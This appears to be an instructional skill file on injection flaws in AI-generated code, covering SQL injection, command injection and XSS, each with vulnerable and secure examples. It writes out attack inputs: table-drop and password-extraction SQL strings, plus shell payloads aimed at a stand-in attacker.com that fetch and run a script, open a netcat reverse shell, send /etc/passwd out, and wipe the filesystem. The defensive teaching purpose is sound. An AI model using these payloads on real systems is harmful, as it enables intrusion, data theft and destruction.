---
name: injection-vulnerabilities-ai-generated-code
description: Understand how AI generates SQL injection, command injection, and XSS vulnerabilities. Use this skill when you need to learn about injection attack patterns in AI code, see real-world examples of injection vulnerabilities, understand why AI generates insecure database queries, or recognize vulnerable code patterns. Triggers include "SQL injection AI", "command injection", "XSS vulnerabilities", "injection attacks", "AI database queries", "shell injection", "cross-site scripting AI code".
---

# Input Validation and Injection Vulnerabilities in AI-Generated Code

## The Prevalence of Injection Flaws

Input validation vulnerabilities represent the **most common security flaw** in AI-generated code. According to a 2025 report from Contrast Security:

> "Input validation is often overlooked or implemented incorrectly in AI-generated code, creating openings for injection attacks that can compromise entire systems."

Because AI models are trained on millions of code examples, many of which contain outdated or insecure patterns, they perpetuate these vulnerabilities.

## 1.1.1 SQL Injection Vulnerabilities

### The Problem

SQL injection remains one of the most critical vulnerabilities in AI-generated code. Research from Aikido Security found that when prompted to create database query functions, AI assistants produced vulnerable code in **68% of cases**.
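Before looking at generated code, the mechanics are easy to demonstrate with a self-contained `sqlite3` sketch (the `users` table and values here are hypothetical): with string concatenation, the quote in the payload escapes the SQL literal and rewrites the `WHERE` clause; with a bound parameter, the same bytes are matched as literal data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("John",), ("Jane",)])

payload = "' OR '1'='1"  # classic always-true injection string

# ❌ Concatenation: the payload's quote closes the string literal,
# so the injected OR clause becomes part of the SQL itself
vulnerable = conn.execute(
    f"SELECT name FROM users WHERE name LIKE '%{payload}%'"
).fetchall()

# ✅ Parameterized: sqlite3 binds the payload as a plain string,
# so it can only match (or fail to match) as data
safe = conn.execute(
    "SELECT name FROM users WHERE name LIKE ?", (f"%{payload}%",)
).fetchall()
```

Here the concatenated query returns every row (the injected clause degenerates to `name LIKE '%'`), while the parameterized query returns nothing, because no name literally contains `' OR '1'='1`.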
### AI-Generated Vulnerable Code

```python
# Prompt: "Create a user search function with database"
def search_users(search_term, role=None):
    # ❌ VULNERABLE: Direct string concatenation
    query = f"SELECT * FROM users WHERE name LIKE '%{search_term}%'"
    if role:
        # ❌ VULNERABLE: Multiple injection points
        query += f" AND role = '{role}'"
    cursor.execute(query)
    return cursor.fetchall()

# Attack vector:
# search_term = "'; DROP TABLE users; --"
# Resulting query: SELECT * FROM users WHERE name LIKE '%'; DROP TABLE users; --%'
```

### Secure Implementation

```python
def search_users_secure(search_term, role=None):
    # ✅ SECURE: Parameterized queries prevent injection
    if role:
        query = "SELECT * FROM users WHERE name LIKE %s AND role = %s"
        params = (f"%{search_term}%", role)
    else:
        query = "SELECT * FROM users WHERE name LIKE %s"
        params = (f"%{search_term}%",)
    cursor.execute(query, params)
    return cursor.fetchall()
```

### Why AI Generates This Vulnerability

**1. Training Data Contamination:**
- Millions of code examples use string concatenation
- Older tutorials show f-strings/string formatting for queries
- AI learns these patterns as "normal"

**2. Simplicity Bias:**
- String concatenation is simpler to generate
- Parameterized queries require understanding database driver specifics
- AI defaults to the "easiest" solution

**3. Lack of Security Context:**
- AI doesn't understand SQL injection attacks
- Can't reason about malicious input
- Focuses on functional correctness, not security

### What Makes It Vulnerable

**Direct String Interpolation:**

```python
f"SELECT * FROM users WHERE name = '{user_input}'"
```

**The Problem:**
- User input is directly embedded in the SQL string
- No separation between code and data
- An attacker can inject SQL commands

**Attack Examples:**

```python
# Normal use:
search_term = "John"
# Query: SELECT * FROM users WHERE name LIKE '%John%'
# ✓ Returns users named John

# Attack 1: Table drop
search_term = "'; DROP TABLE users; --"
# Query: SELECT * FROM users WHERE name LIKE '%'; DROP TABLE users; --%'
# ✗ Deletes entire users table

# Attack 2: Data exfiltration
search_term = "' UNION SELECT password FROM admin WHERE '1'='1"
# Query: SELECT * FROM users WHERE name LIKE '%' UNION SELECT password FROM admin WHERE '1'='1%'
# ✗ Exposes admin passwords

# Attack 3: Bypass authentication
search_term = "' OR '1'='1"
# Query: SELECT * FROM users WHERE name LIKE '%' OR '1'='1%'
# ✗ Returns all users (always-true condition)
```

### Real-World Impact

**Heartland Payment Systems (2008):**
- SQL injection used to breach the payment network
- Roughly **130 million card numbers** compromised
- One of the largest payment-card breaches on record
- Settlements and fines totaled well over **$100 million**

## 1.1.2 Command Injection Vulnerabilities

### The Problem

A 2024 analysis by SecureLeap found that AI models **frequently generate code vulnerable to command injection**, particularly when dealing with system operations.
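The same failure mode is easy to reproduce in Python, where generated code often passes user input to `subprocess` with `shell=True`. In this minimal sketch (a hypothetical filename parameter, with `echo` standing in for a real conversion tool), a `;` in the filename terminates the command under the shell but is inert when passed as a single argv entry:

```python
import subprocess

def convert_unsafe(input_file):
    # ❌ shell=True hands the whole string to /bin/sh, so shell
    # metacharacters in input_file are interpreted as syntax
    result = subprocess.run(
        f"echo converting {input_file}",
        shell=True, capture_output=True, text=True,
    )
    return result.stdout

def convert_safe(input_file):
    # ✅ Argument list, no shell: input_file is one argv entry,
    # and any metacharacters in it are treated literally
    result = subprocess.run(
        ["echo", "converting", input_file],
        capture_output=True, text=True,
    )
    return result.stdout

payload = "image.jpg; echo INJECTED"
# unsafe: the shell splits on ';' and runs a second command
# safe: the entire payload is echoed back as literal text
```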
The models often default to:
- Using `shell=True` in subprocess calls
- Direct string concatenation in system commands
- No input validation before shell execution

### AI-Generated Vulnerable Code

```javascript
// Prompt: "Create an image conversion API endpoint"
const { exec } = require('child_process');

app.post('/convert-image', (req, res) => {
  const { inputFile, outputFormat, quality } = req.body;

  // ❌ VULNERABLE: Unvalidated user input in shell command
  const command = `convert ${inputFile} -quality ${quality} output.${outputFormat}`;

  exec(command, (error, stdout, stderr) => {
    if (error) {
      return res.status(500).json({ error: error.message });
    }
    res.json({ success: true, output: `output.${outputFormat}` });
  });
});

// Attack vector:
// inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"
```

### Secure Implementation

```javascript
const { spawn } = require('child_process');
const path = require('path');

app.post('/convert-image', (req, res) => {
  const { inputFile, outputFormat, quality } = req.body;

  // ✅ SECURE: Input validation
  if (!/^[a-zA-Z0-9_\-]+\.(jpg|png|gif)$/.test(inputFile)) {
    return res.status(400).json({ error: 'Invalid input file' });
  }
  if (!['jpg', 'png', 'webp'].includes(outputFormat)) {
    return res.status(400).json({ error: 'Invalid output format' });
  }
  const qualityNum = parseInt(quality, 10);
  if (isNaN(qualityNum) || qualityNum < 1 || qualityNum > 100) {
    return res.status(400).json({ error: 'Invalid quality value' });
  }

  // ✅ SECURE: Use spawn with argument array
  const convert = spawn('convert', [
    path.basename(inputFile),
    '-quality',
    qualityNum.toString(),
    `output.${outputFormat}`
  ]);

  convert.on('close', (code) => {
    if (code !== 0) {
      return res.status(500).json({ error: 'Conversion failed' });
    }
    res.json({ success: true, output: `output.${outputFormat}` });
  });
});
```

### Why AI Generates This Vulnerability

**1. exec() is Simpler:**
- Single function call vs spawn() configuration
- AI defaults to the simpler API
- exec() allows shell syntax (pipes, redirects)

**2. String Interpolation Habit:**
- Consistent with other code patterns
- AI sees millions of examples using template strings
- Doesn't recognize the security boundary

**3. No Input Validation in Training Data:**
- Many examples skip validation for brevity
- Tutorial code focuses on functionality
- Security controls are added separately (if at all)

### Attack Scenarios

**Attack 1: Command Chaining**

```javascript
inputFile = "image.jpg; rm -rf /"
// Executes: convert image.jpg -quality 80 output.jpg; rm -rf /
// Deletes entire file system
```

**Attack 2: Reverse Shell**

```javascript
inputFile = "image.jpg; nc attacker.com 4444 -e /bin/bash"
// Opens reverse shell to attacker
// Attacker gains shell access to server
```

**Attack 3: Data Exfiltration**

```javascript
inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"
// Sends sensitive files to attacker
```

### Key Security Principles

**exec() vs spawn():**

| Feature | exec() | spawn() |
|---------|--------|---------|
| Shell | Always uses shell | No shell by default |
| Security | ❌ Dangerous | ✅ Safe |
| Arguments | String (injectable) | Array (not injectable) |
| Use case | Never with user input | Preferred for all cases |

## 1.1.3 Cross-Site Scripting (XSS) Vulnerabilities

### The Problem

According to research from KDnuggets:

> "AI assistants often miss proper output encoding, creating XSS vulnerabilities that can lead to session hijacking and data theft."

The problem is particularly acute in template generation and dynamic HTML creation.

### AI-Generated Vulnerable Code

```javascript
// Prompt: "Create a comment display system"
app.get('/comments/:postId', async (req, res) => {
  const comments = await getComments(req.params.postId);

  let html = '<h2>Comments</h2>';
  comments.forEach(comment => {
    // ❌ VULNERABLE: Direct interpolation of user content
    html += `<div class="comment">${comment.content}<span>${comment.timestamp}</span></div>`;
  });
  res.send(html);
});
```

❌ **Dangerous patterns:**

```javascript
html += "<div>" + comment + "</div>";  // unescaped concatenation
element.innerHTML = userData.bio;      // unescaped assignment
```

✅ **Escaped output:**

```javascript
html += `<div class="comment">${escapeHtml(comment.content)}<span>${escapeHtml(comment.timestamp)}</span></div>`;
```
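The `escapeHtml` helper in the escaped output is not a JavaScript built-in; any implementation must rewrite the characters that delimit HTML (`&`, `<`, `>`, and quotes) as entities. Python ships the same transformation in its standard library as `html.escape`, which makes the behavior easy to inspect:

```python
from html import escape

payload = '<script>alert("xss")</script>'

# escape() rewrites &, <, > (and, with quote=True, both quote
# characters) as HTML entities, so a browser renders the payload
# as visible text instead of executing it as markup
safe = escape(payload, quote=True)
print(safe)
```

Note that `&` must be escaped first; otherwise the `&` introduced by `&lt;` and friends would itself be double-escaped, which is why hand-rolled helpers frequently get the ordering wrong.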